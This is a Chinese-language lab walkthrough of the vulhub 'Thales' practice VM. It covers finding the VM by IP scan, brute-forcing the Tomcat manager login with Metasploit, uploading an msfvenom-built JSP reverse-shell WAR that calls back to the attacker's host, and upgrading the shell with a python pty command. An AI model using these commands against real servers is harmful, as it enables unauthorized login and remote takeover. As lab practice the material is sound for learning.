vulhub-Thales靶机练习

1.安装靶机

可以看到没有IP地址,所以我们得通过kali扫出我们的IP地址

2.IP扫描

可以根据我们的MAC地址来判断除我们的靶机IP,同时我们可以看到开放了22和8080端口

3.端口访问

首先我们访问一下8080端口

点击host manager,给我们弹出一个登录界面

4.漏洞查找

这时我们可以利用msf来爆破一下,首先我们先启动一下msf

复制代码
msfconsole

然后我们查找一下tomcat可以利用的东西

复制代码
search tomcat login

接下来我们利用这个来进行爆破,这里已经给了我们怎么使用的语句

复制代码
use 0

输入我们要爆破的IP地址

复制代码
set rhosts 172.16.2.5
run

成功获得我们的账号密码

然后去登录一下,登录到我们的管理员系统

在应用程序列表的位置我们找到了上传文件的地方,这里我们可以上传一个反弹shell的文件

利用kali生成一个反弹shell的war文件

复制代码
msfvenom  -p java/jsp_shell_reverse_tcp LHOST=172.16.2.61 LPORT=8888 -f war -o shell.war //kali的地址以及端口

上传我们的shell文件并开启监听

可以看到反弹shell成功,可以升级一下变成可交互的页面

复制代码
python3 -c "import pty;pty.spawn('/bin/bash')"
相关推荐
LH_R12 小时前
OneTerm开源堡垒机实战(三):功能扩展与效率提升
运维·后端·安全
你的人类朋友1 天前
什么是API签名?
前端·后端·安全
深盾安全1 天前
ProGuard混淆在Android程序中的应用
安全
CYRUS_STUDIO1 天前
利用 Linux 信号机制(SIGTRAP)实现 Android 下的反调试
android·安全·逆向
白帽黑客沐瑶1 天前
【网络安全就业】信息安全专业的就业前景(非常详细)零基础入门到精通,收藏这篇就够了
网络·安全·web安全·计算机·程序员·编程·网络安全就业
深盾安全1 天前
符号执行技术实践-求解程序密码
安全
贾维思基2 天前
被监管警告后,我连夜给系统上了“双保险”!
安全
00后程序员张2 天前
iOS App 混淆与加固对比 源码混淆与ipa文件混淆的区别、iOS代码保护与应用安全场景最佳实践
android·安全·ios·小程序·uni-app·iphone·webview
Devil枫2 天前
鸿蒙深链落地实战:从安全解析到异常兜底的全链路设计
安全·华为·harmonyos
lubiii_2 天前
网络安全渗透测试第一步信息收集
安全·web安全·网络安全